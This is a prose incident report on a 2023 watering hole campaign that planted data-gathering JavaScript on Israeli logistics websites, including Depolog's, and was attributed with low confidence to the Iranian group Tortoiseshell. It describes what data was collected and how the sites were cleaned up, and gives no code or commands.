Cyber Incident Victim: Depolog

On or around April 18, 2023, a cybersecurity incident targeting Israeli shipping and logistics companies was identified and reported by the Tel Aviv-based cybersecurity firm ClearSky. The incident involved a watering hole attack campaign in which at least eight Israeli websites were compromised. Among the specifically named targeted entities were the shipping company SNY Cargo, the logistics firm Depolog, and the restaurant equipment supplier SZM. The threat actors behind this activity were attributed with low confidence to the Iranian nation-state group known as Tortoiseshell, which is also tracked as TA456 and Imperial Kitten. This group has been documented as active since at least July 2018.

The attack methodology centered on compromising websites that were frequently visited by the intended targets, a tactic known as a watering hole attack. In this specific campaign, the hackers injected malicious JavaScript code into the compromised websites. The primary function of this code was information gathering. When a user visited one of the infected sites, the malicious script would activate and collect specific data from their computer. The collected information included the user's IP address, their screen resolution, and the URL of the webpage they had visited immediately prior to landing on the compromised site. The attackers also sought to determine the user’s computer language preference, an action likely intended to facilitate the customization of future attacks against those specific users.

The majority of the websites that were compromised in this campaign were utilizing the uPress hosting service. This particular hosting provider had previously been targeted in 2020 by another Iranian threat group, Emennet Pasargad, in an attack that resulted in the defacement of thousands of Israeli websites. In the 2023 incident, the attackers used the domain jquery-stack[.]online to host and deliver their malicious payload. This domain was designed to impersonate the legitimate and widely used JavaScript framework jQuery, a deception tactic aimed at avoiding detection by anyone who might inspect the website's source code. This specific domain had been previously attributed to the Tortoiseshell group in earlier operations.

The malicious code was deployed to gather intelligence on visitors to these sites. The data exfiltrated provided the attackers with a profile of the users, which could be used for subsequent, more targeted operations. The use of a watering hole attack by Iranian state-sponsored actors has a established history; ClearSky researchers noted that Iranian hackers have employed this method since 2017. For example, in the previous year, a separate suspected Iranian threat actor tracked by Mandiant as UNC3890 utilized a similar watering hole technique to target organizations across the shipping, healthcare, government, and energy sectors within Israel.

By April 18, 2023, most of the compromised websites had been cleared of the malicious code, indicating that a remediation and containment effort had been successfully undertaken. The report from ClearSky did not specify which entities were responsible for this cleanup, though it typically involves the affected website owners and their hosting providers. The immediate impact of the incident was the confirmed loss of user data from the visitors to the sites during the period they were compromised. The potential consequences of such data collection include an increased risk of highly targeted spear-phishing campaigns or other tailored attacks against the individuals whose information was stolen, particularly if they were employees of the targeted shipping and logistics sector.

The incident is situated within the broader context of ongoing cyber tensions between Iran and Israel. The two nations frequently engage in cyber operations against one another, driven by longstanding political animosity. Iranian state-sponsored attacks against Israeli interests vary in objective, ranging from data theft and espionage to system destruction and disinformation campaigns. According to Microsoft, while these Iranian actors are generally assessed to be less advanced than their Russian or Chinese counterparts, they have been actively enhancing their capabilities. A notable aspect of their evolving tactics is the rapid exploitation of newly disclosed software vulnerabilities to breach organizations and the use of tailored tools against specific targets.

The Tortoiseshell group itself has a history of employing diverse methods. Prior to this watering hole campaign, the group was known to have used both custom-made and commercially available off-the-shelf malware. In a previous operation, they executed a supply chain attack targeting IT providers in Saudi Arabia. The strategic goal of that campaign was to ultimately compromise the customers of those IT providers, demonstrating a pattern of targeting intermediaries to reach a broader set of victims. The 2023 attack on Depolog and other Israeli companies represents a continuation of this group's focus on the logistics and supply chain sector, albeit through a different initial attack vector. The re-use of a known malicious domain tied to their past operations provided a key piece of evidence for the low-confidence attribution to the group. The incident underscores the persistent threat posed by watering hole attacks as an effective means for threat actors to gather intelligence on a specific user base without needing to directly breach the victims' own networks.